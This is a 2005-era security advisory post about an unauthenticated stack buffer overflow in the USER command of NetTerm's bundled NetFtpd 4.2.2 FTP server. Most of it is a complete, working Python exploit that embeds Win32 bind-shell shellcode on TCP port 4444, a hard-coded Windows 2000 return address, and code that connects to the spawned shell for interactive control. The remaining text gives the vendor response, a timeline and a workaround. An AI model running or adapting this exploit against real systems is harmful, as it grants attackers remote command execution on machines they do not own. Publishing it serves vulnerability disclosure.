
ADV: NetTerm's NetFtpd 4.2.2 Buffer Overflow + PoC Exploit



See attached files.
Cheers,
  shadown

-- 
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown@xxxxxxxxx

This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure. If you have
received it by mistake please let us know by e-mail immediately and
delete it from your system; you should also not copy the message or
disclose its contents to anyone. Many thanks.
#
# Net-ftpd 4.2.2 USER-command authentication buffer-overflow exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

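class warftpd:
    """Build and fire the NetFtpd 4.2.2 ``USER`` stack overflow.

    The request is a classic 32-bit stack smash.  After the literal ``USER ``
    the argument is laid out as::

        [ 'A' * (bsize - len(sc) - 50) ][ sc ][ 'B' * 46 ][ ebp ][ ret ]

    so the return address sits at offset ``bsize`` from the start of the
    argument and the whole argument is ``bsize + 4`` bytes long.

    Attributes:
        host, port: target FTP daemon.
        bsize: distance in bytes from the start of the argument to the saved
            return address.  The default (512) is smaller than the embedded
            shellcode, so callers must raise it (the script uses 1014) before
            calling ``genbuffer()``, which otherwise raises ``ValueError``.
        ebpaddr: int written over the saved frame pointer (packed
            little-endian).
        retaddr: value written over the saved return address; either an int
            (packed little-endian) or an already-packed 4-byte string.
        sctype, scport: stored for the caller's convenience but never read --
            the embedded payload always binds a shell on TCP/4444 and
            ``exploit()`` always connects there.

    Works on Python 2.6+ and Python 3 (bytes literals, ``print()``); the
    original listing was Python 2 only.

    NOTE(review): the class is named ``warftpd`` although the target is
    NetFtpd, presumably inherited from an earlier exploit; kept because
    external code may refer to it.
    """

    # TCP port the embedded payload binds a shell on; exploit() connects here.
    SHELL_PORT = 4444
    # Bytes between the end of the shellcode and the return address:
    # 46 x 'B' filler followed by the 4-byte saved EBP.
    _TAIL = 50

    # Win32 bind shell on TCP/4444, alphanumeric-encoded; per the original
    # author's note it comes from Metasploit ("Alpha port bind 4444").
    _SHELLCODE = (
        b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x51\x5a\x6a\x46"
        b"\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x56\x42\x32\x42\x41\x32"
        b"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x6b\x4c\x70"
        b"\x6a\x78\x6b\x70\x4f\x6d\x38\x59\x69\x49\x6f\x69\x6f\x6b\x4f\x61"
        b"\x70\x4c\x4b\x70\x6c\x35\x74\x66\x44\x6c\x4b\x73\x75\x45\x6c\x4c"
        b"\x4b\x31\x6c\x55\x55\x62\x58\x54\x41\x38\x6f\x6e\x6b\x50\x4f\x57"
        b"\x68\x4c\x4b\x33\x6f\x65\x70\x56\x61\x38\x6b\x69\x73\x50\x30\x37"
        b"\x39\x6c\x4b\x50\x34\x4e\x6b\x77\x71\x58\x6e\x34\x71\x4b\x70\x4a"
        b"\x39\x6e\x4c\x6b\x34\x4f\x30\x64\x34\x35\x57\x6b\x71\x6b\x7a\x56"
        b"\x6d\x53\x31\x78\x42\x7a\x4b\x69\x64\x35\x6b\x32\x74\x61\x34\x76"
        b"\x48\x44\x35\x4d\x33\x4c\x4b\x63\x6f\x56\x44\x37\x71\x5a\x4b\x50"
        b"\x66\x6e\x6b\x66\x6c\x32\x6b\x4c\x4b\x31\x4f\x45\x4c\x75\x51\x38"
        b"\x6b\x34\x43\x76\x4c\x4c\x4b\x6b\x39\x72\x4c\x45\x74\x47\x6c\x63"
        b"\x51\x7a\x63\x45\x61\x4f\x30\x53\x54\x4e\x6b\x67\x30\x30\x30\x4c"
        b"\x4b\x63\x70\x34\x4c\x4e\x6b\x34\x30\x37\x6c\x4e\x4d\x4e\x6b\x71"
        b"\x50\x55\x58\x61\x4e\x73\x58\x6e\x6e\x70\x4e\x64\x4e\x68\x6c\x70"
        b"\x50\x4b\x4f\x6b\x66\x30\x31\x49\x4b\x50\x66\x52\x73\x53\x56\x30"
        b"\x68\x74\x73\x57\x42\x43\x58\x61\x67\x61\x63\x75\x62\x63\x6f\x36"
        b"\x34\x49\x6f\x58\x50\x45\x38\x4a\x6b\x4a\x4d\x39\x6c\x57\x4b\x56"
        b"\x30\x69\x6f\x5a\x76\x43\x6f\x4d\x59\x78\x65\x35\x36\x4c\x41\x48"
        b"\x6d\x66\x68\x37\x72\x71\x45\x62\x4a\x64\x42\x6b\x4f\x38\x50\x35"
        b"\x38\x6e\x39\x64\x49\x7a\x55\x4c\x6d\x31\x47\x79\x6f\x6e\x36\x56"
        b"\x33\x62\x73\x72\x73\x30\x53\x71\x43\x77\x33\x30\x53\x67\x33\x36"
        b"\x33\x59\x6f\x7a\x70\x30\x66\x70\x68\x76\x71\x73\x6c\x41\x76\x72"
        b"\x73\x6f\x79\x7a\x41\x4c\x55\x32\x48\x4c\x64\x44\x5a\x74\x30\x4a"
        b"\x67\x56\x37\x49\x6f\x4a\x76\x51\x7a\x44\x50\x42\x71\x53\x65\x6b"
        b"\x4f\x38\x50\x30\x68\x6f\x54\x4e\x4d\x44\x6e\x79\x79\x30\x57\x79"
        b"\x6f\x68\x56\x41\x43\x30\x55\x4b\x4f\x4a\x70\x52\x48\x4d\x35\x67"
        b"\x39\x6f\x76\x30\x49\x33\x67\x6b\x4f\x4a\x76\x72\x70\x63\x64\x61"
        b"\x44\x30\x55\x49\x6f\x38\x50\x4c\x53\x65\x38\x4b\x57\x72\x59\x6a"
        b"\x66\x63\x49\x72\x77\x69\x6f\x78\x56\x41\x45\x4b\x4f\x6a\x70\x70"
        b"\x66\x70\x6a\x63\x54\x61\x76\x30\x68\x43\x53\x72\x4d\x6c\x49\x68"
        b"\x65\x53\x5a\x70\x50\x53\x69\x76\x49\x6a\x6c\x6f\x79\x4d\x37\x61"
        b"\x7a\x67\x34\x4e\x69\x59\x72\x37\x41\x6b\x70\x6a\x53\x4c\x6a\x59"
        b"\x6e\x53\x72\x56\x4d\x59\x6e\x33\x72\x64\x6c\x6c\x53\x4e\x6d\x42"
        b"\x5a\x35\x68\x4c\x6b\x6e\x4b\x4e\x4b\x72\x48\x44\x32\x6b\x4e\x4d"
        b"\x63\x54\x56\x79\x6f\x43\x45\x32\x64\x6b\x4f\x6b\x66\x33\x6b\x53"
        b"\x67\x30\x52\x63\x61\x66\x31\x52\x71\x53\x5a\x74\x41\x56\x31\x32"
        b"\x71\x73\x65\x50\x51\x4b\x4f\x5a\x70\x32\x48\x6c\x6d\x4a\x79\x47"
        b"\x75\x48\x4e\x62\x73\x6b\x4f\x7a\x76\x61\x7a\x6b\x4f\x6b\x4f\x35"
        b"\x67\x6b\x4f\x68\x50\x6e\x6b\x31\x47\x4b\x4c\x6d\x53\x68\x44\x41"
        b"\x74\x4b\x4f\x4e\x36\x36\x32\x49\x6f\x68\x50\x75\x38\x6c\x30\x4f"
        b"\x7a\x56\x64\x31\x4f\x43\x63\x59\x6f\x4a\x76\x4b\x4f\x38\x50\x46"
    )
    # A second, unused payload that was commented out in the original listing
    # has been dropped.

    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.bsize = 512          # too small for _SHELLCODE; see class docstring
        self.ebpaddr = 0xcacacaca
        self.retaddr = 0xdeadbeef
        self.sctype = 'findskt'   # recorded only, never consulted
        self.scport = None        # recorded only, never consulted

    def setebpaddr(self, addr):
        """Set the int written over the saved EBP."""
        self.ebpaddr = addr

    def setretaddr(self, addr):
        """Set the return address: an int, or a pre-packed 4-byte string."""
        self.retaddr = addr

    def setbsize(self, size):
        """Set the offset of the return address within the USER argument."""
        self.bsize = size

    def setsctype(self, type):
        """Record a shellcode type; has no effect on the generated payload."""
        self.sctype = type

    def setscport(self, port):
        """Record a shellcode port; has no effect (payload always uses 4444)."""
        self.scport = port

    def _packed_retaddr(self):
        """Return ``retaddr`` as exactly 4 bytes.

        A bytes/str value is used verbatim (a Python 3 text literal is encoded
        as latin-1 so ``'\\x4c\\xfa\\x12\\x00'`` still means those four bytes);
        anything else is treated as an address and packed little-endian.  The
        original compared ``__class__.__name__`` to ``'int'``, which misfired
        on Python 2 ``long`` values such as ``0xdeadbeef`` on 32-bit builds and
        then failed with a TypeError while concatenating.

        Raises:
            ValueError: if the result is not 4 bytes long.
        """
        ret = self.retaddr
        if isinstance(ret, bytes):
            pass
        elif isinstance(ret, str):
            ret = ret.encode('latin-1')
        else:
            ret = struct.pack('<L', ret)
        if len(ret) != 4:
            raise ValueError("retaddr must be exactly 4 bytes, got %d" % len(ret))
        return ret

    def genbuffer(self):
        """Return the complete ``USER ...`` request that triggers the overflow.

        Returns:
            bytes (``str`` on Python 2): ``b"USER "`` followed by
            ``bsize + 4`` payload bytes.  No CRLF is appended, matching the
            original exploit.

        Raises:
            ValueError: if ``bsize`` leaves no room for the shellcode plus the
                50-byte tail (the original silently produced a buffer of the
                wrong shape in that case), or if ``retaddr`` is not 4 bytes.
        """
        sc = self._SHELLCODE
        sled_len = self.bsize - len(sc) - self._TAIL
        if sled_len < 0:
            raise ValueError(
                "bsize %d is too small: need at least %d bytes for shellcode + tail"
                % (self.bsize, len(sc) + self._TAIL))
        nops = b"\x41" * sled_len
        ebp = struct.pack('<L', self.ebpaddr)
        ret = self._packed_retaddr()
        return b"".join([
            b"USER ",
            nops,
            sc,
            b"\x42" * (self._TAIL - 4),
            ebp,
            ret,
        ])

    @staticmethod
    def _interact(sock):
        """Drive an interactive session over an already-connected socket.

        ``telnetlib`` is imported lazily, as in the original, so a missing
        module (it was deprecated and later removed from the standard library
        under PEP 594) does not break ``genbuffer()``.  Only the exceptions a
        dropped or interrupted session is expected to raise are swallowed;
        anything else propagates instead of being hidden by a bare ``except``.
        """
        from telnetlib import Telnet
        telnet = Telnet()
        telnet.sock = sock
        try:
            telnet.interact()
        except (KeyboardInterrupt, EOFError, socket.error):
            pass

    def exploit(self):
        """Send the overflow, then try to attach to the bind shell.

        Flow: connect to ``host:port``, read (and print) up to 100 bytes of
        banner, send ``genbuffer()``, wait, disconnect, then connect to
        ``host:4444``.  If the first 1024 bytes read from that socket contain
        ``Microsoft Windows`` the socket is handed to ``telnetlib`` for an
        interactive session; otherwise failure is reported.  A failed attempt
        normally leaves the daemon crashed, because the return address is a
        single hard-coded value.

        No socket timeout is set, so a target that accepts the connection but
        never answers blocks forever.  NOTE(review): consider a settimeout().

        Returns:
            None in every case; progress is reported on stdout.
        """
        skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            skt.connect((self.host, self.port))
        except socket.error as err:
            # original indexed err[1], which fails for single-argument errors
            skt.close()
            print("[-] Error: %s" % err)
            return None
        print("[+] Connected to %s:%d" % (self.host, self.port))
        try:
            print("[+] Receiving Banner")
            res = skt.recv(100)
            print(res)
            time.sleep(1)
            print("[+] Sending payload")
            # sendall(): send() may deliver only part of a 1 KiB request
            skt.sendall(self.genbuffer())
            # original note: "test on mcafee anti-b0f" -- presumably leaves the
            # host-side protection time to react before we disconnect
            time.sleep(2)
        finally:
            skt.close()

        # give the payload time to bind before connecting to the shell
        time.sleep(2)
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            shell.connect((self.host, self.SHELL_PORT))
        except socket.error as err:
            shell.close()
            print("[-] Error: %s" % err)
            print("[-] Explotation failed\n[-] Daemon should be dead...")
            return None
        print("[+] Connected to shell at %s on port %d" % (self.host, self.SHELL_PORT))
        try:
            res = shell.recv(1024)
            # cmd.exe announces itself with "Microsoft Windows ..."
            if res and res.count(b'Microsoft Windows'):
                print("[+] Welcome my lord, i'm here to serve you ;) ...\n")
                self._interact(shell)
                print("[-] Bye..bye I hope you've enjoyed your stay.. ;)")
                return None
        finally:
            shell.close()
        print('[-] Explotation failed\nDaemon should be dead...')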

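def main(argv):
    """Command-line entry point: ``netftpd.py host port``.

    Validates both arguments, configures a ``warftpd`` instance with the
    values the original author found to work (``bsize`` 1014 and the
    hard-coded Windows 2000 return address 0x0012fa4c) and fires it.  Bad
    arguments produce a usage/error message and exit status 1; the original
    died with a ValueError traceback on a non-numeric port.

    Args:
        argv: full argument vector, ``argv[0]`` being the program name.
    """
    if len(argv) != 3:
        print("*************************************")
        print("* Coded by Sergio 'shadown' Alvarez *")
        print("*          shadown@xxxxxxxxx        *")
        print("*************************************")
        print("Usage: %s host port" % argv[0])
        sys.exit(1)
    host = argv[1]
    try:
        port = int(argv[2])
    except ValueError:
        print("[-] Error: port must be a number, got %r" % argv[2])
        sys.exit(1)
    if not 0 < port < 65536:
        print("[-] Error: port out of range: %d" % port)
        sys.exit(1)

    exp = warftpd(host, port)
    # The original also called setsctype('findskt') and setscport(1234);
    # both are dropped because warftpd never reads them -- the payload
    # always binds a shell on TCP/4444.
    exp.setbsize(1014)
    # Overwrites the saved EBP; the original comment: "sometimes needed,
    # just in case".
    exp.setebpaddr(0xdeadbeef)
    # 0x0012fa4c little-endian: per the original author a jump back into the
    # input buffer valid on Win2k SP0-SP4.  A wrong value just crashes the
    # daemon.
    exp.setretaddr(b'\x4c\xfa\x12\x00')
    exp.exploit()


if __name__ == '__main__':
    main(sys.argv)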

Vendor: InterSoft International Inc.
Product: NetTerm
Version: NetTerm 5.1.1 (bundling NetFtpd 4.2.2); earlier versions are probably affected too
Vulnerability Type: Buffer Overflow
Download Link: http://www.securenetterm.com/pub/nt32511i.exe

Credits:
  Discovered by Sergio 'shadown' Alvarez while teaching a 'Vuln-Dev on Win32 and Exploits Coding' course.

History:
  Discovered date: 21/04/2005
  Reported: 26/04/2005
  Vendor Response: 26/04/2005
  		This is a known bug that has been reported to our clients.
		Netftpd was a free addition to our NetTerm product, at the request of our clients.
		They were warned to never use netftpd as a general purpose ftp server, and to only use it behind a firewall.
		However, it does still present a potential problem, so we have removed it from the NetTerm distribution.
		Our www site at www.netterm.com and www.securenetterm.com has been updated with a version of NetTerm that does not contain the netftpd.exe program.
		We will also update the What's New page on both web sites for the new release in the next two days.
		Thanks for bringing to to our attention.	  
			Ken
  Patch Release: None
  Public Advisory: 26/04/2005

Description:
  NetTerm is a widely used Win32 telnet client. NetFtpd is a small FTP server that was bundled with it (see the vendor response above).

Vulnerability:
  NetTerm's NetFtpd 4.2.2 has a stack-based buffer overflow in its authentication handling: an overlong argument to the USER command overwrites the saved frame pointer and return address, and because USER is sent before any login, no credentials are needed. Only the USER command has been tested; other commands may well be vulnerable too.

Patch:
	None. The vendor's response was to remove netftpd.exe from the NetTerm download rather than fix it, so installations that already have the binary presumably remain vulnerable.

Workaround:
  Do not run netftpd.exe: remove or disable it. If it must stay up until it can be removed, restrict access to it at the firewall, as the vendor itself advised, and never expose it to untrusted networks.
  
PoC Exploit:
  Attached is a working Python exploit for Windows 2000, any service pack. It spawns a bind shell on TCP/4444 and relies on a single hard-coded return address (0x0012fa4c, a jump back into the input buffer); when that address is wrong the daemon simply crashes, so a failed attempt is effectively a denial of service.